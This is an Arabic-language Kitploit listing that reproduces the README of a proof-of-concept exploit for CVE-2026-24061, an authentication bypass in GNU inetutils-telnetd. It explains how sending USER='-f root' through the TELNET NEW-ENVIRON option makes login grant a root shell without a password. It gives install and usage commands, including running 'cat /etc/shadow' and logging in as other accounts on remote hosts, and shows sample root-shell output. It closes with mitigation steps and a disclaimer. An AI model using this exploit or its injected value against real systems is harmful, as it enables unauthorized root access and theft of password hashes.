Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061 — # ثغرة تجاوز المصادقة في inetutils-telnetd - تعمل | Kitploit
أدوات/GitHubGitHub/balgan/cve-2026-24061
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الشبكاتاختبار الاختراقالمصادقة
GitHubbalgan/cve-2026-24061

CVE-2026-24061

# ثغرة تجاوز المصادقة في inetutils-telnetd - تعمل

عرض المستودع
423منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24061 — تجاوز المصادقة في inetutils-telnetd

إثبات مفهوم لاستغلال ثغرة تجاوز المصادقة في GNU inetutils-telnetd.

نظرة عامة

CVE-2026-24061 هي ثغرة حرجة في تجاوز المصادقة تؤثر على إصدارات inetutils-telnetd من 1.9.3 حتى 2.7. تسمح لمهاجم عن بُعد بالحصول على صلاحيات الجذر (root shell) على الأنظمة الضعيفة دون تقديم أي بيانات اعتماد.

تفاصيل الثغرة

الحقلالقيمة
معرف CVECVE-2026-24061
البرنامج المتأثرGNU inetutils-telnetd
الإصدارات المتأثرة1.9.3 – 2.7
نوع الثغرةتجاوز المصادقة
درجة CVSSحرجة
متجه الهجومالشبكة

كيف تعمل

تستغل الثغرة خللاً في طريقة تعامل telnetd مع متغير البيئة USER المستلم عبر خيار TELNET NEW-ENVIRON (RFC 1572) أثناء التفاوض على البروتوكول.

  1. تفاوض بروتوكول TELNET: عندما يتصل عميل، يتفاوض الخادم والعميل على الإمكانيات بما في ذلك خيار NEW-ENVIRON، الذي يسمح للعميل بإرسال متغيرات البيئة.

  2. قيمة USER الخبيثة: يرسل الاستغلال USER=-f root كمتغير بيئة خلال مرحلة التفاوض هذه.

  3. تمرير الوسائط غير الآمن: يمرر telnetd الضعيف هذه القيمة دون تنقية إلى برنامج login.

  4. حقن الأوامر: يفسر برنامج login قيمة -f root كخيارات سطر أوامر:

    • -f = "فرض تسجيل الدخول دون مصادقة"
    • root = اسم المستخدم لتسجيل الدخول به
  5. الوصول إلى الجذر: يحصل المهاجم على صلاحيات الجذر دون أن يُطلب منه كلمة مرور إطلاقاً.

المشكلة الأساسية

يرسل العميل:  USER = "-f root"
ينفذ telnetd:  login -f root
النتيجة:        منح صلاحيات الجذر دون مصادقة

هذا يعادل تشغيل USER='-f root' telnet -a localhost على نظام يحتوي على telnetd ضعيف.

المتطلبات

  • Python 3.6+
  • لا توجد تبعيات خارجية (يستخدم مكتبة Python القياسية فقط)

التثبيت

git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

الاستخدام

./exploit.py [OPTIONS] <target>

الخيارات

الخيارالوصفالافتراضي
hostاسم المضيف أو عنوان IP الهدفمطلوب
-p, --portمنفذ الهدف23
-u, --userقيمة USER للحقن-f root
-c, --commandتنفيذ أمر واحد (غير تفاعلي)لا شيء
-t, --timeoutمهلة الاتصال بالثواني10

أمثلة

صلاحيات جذر تفاعلية على localhost:

./exploit.py localhost

صلاحيات جذر تفاعلية على مضيف بعيد:

./exploit.py 192.168.1.100

تنفيذ أمر واحد والخروج:

./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

تسجيل الدخول كمستخدم مختلف:

./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

منفذ غير قياسي:

./exploit.py -p 2323 localhost

دمج الخيارات:

./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

الوضع التفاعلي

عند التشغيل دون علامة -c، يمنحك الاستغلال قشرة تفاعلية:

  • دعم كامل لـ TTY مع معالجة صحيحة للطرفية
  • اضغط Ctrl+] للخروج وإغلاق الاتصال
  • اضغط Ctrl+C للمقاطعة

مثال على المخرجات

╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - inetutils-telnetd Authentication Bypass    ║
║  Affects: inetutils-telnetd 1.9.3 - 2.7                      ║
╚══════════════════════════════════════════════════════════════╝

[*] Connected to 192.168.1.100:23
[*] Negotiating TELNET options...
[*] Agreed to NEW-ENVIRON (sending USER='-f root')
[+] Sent USER='-f root' via NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

التخفيف

إجراءات فورية

  1. تعطيل telnetd: إذا لم يكن مطلوباً بشكل صارم، قم بتعطيل خدمة telnet بالكامل

    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. استخدم SSH بدلاً من ذلك: استبدل telnet بـ SSH للوصول عن بُعد

    sudo apt install openssh-server
    
  3. قواعد جدار الحماية: احظر المنفذ 23 من الشبكات غير الموثوقة

    sudo ufw deny 23/tcp
    

الإصلاح طويل الأمد

  • قم بالتحديث إلى إصدار مصحح من inetutils عند توفره
  • راقب إعلانات البائعين للتصحيحات الأمنية

التفاصيل التقنية

ينفذ الاستغلال عميل TELNET بسيط يقوم بـ:

  1. إنشاء اتصال TCP بالهدف
  2. الرد على مفاوضات خيارات TELNET (DO/DONT/WILL/WONT)
  3. عندما يطلب الخادم متغيرات البيئة عبر NEW-ENVIRON:
    • يرسل USER=-f root في استجابة ENV_IS
  4. يتعامل مع مفاوضات نوع الطرفية (TTYPE) وحجم النافذة (NAWS)
  5. يوفر أوضاعاً تفاعلية أو لتنفيذ الأوامر

RFCs ذات الصلة

  • RFC 854 — مواصفات بروتوكول TELNET
  • RFC 1572 — خيار بيئة TELNET

إخلاء المسؤولية

هذه الأداة مقدمة لأغراض تعليمية واختبارات أمنية مصرح بها فقط.

  • استخدم هذا الاستغلال فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني في معظم الدول
  • المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة

الترخيص

رخصة MIT — راجع LICENSE للتفاصيل.

المراجع

  • تفاصيل CVE-2026-24061
  • GNU inetutils
  • بروتوكول TELNET RFC 854
تنزيل الأداة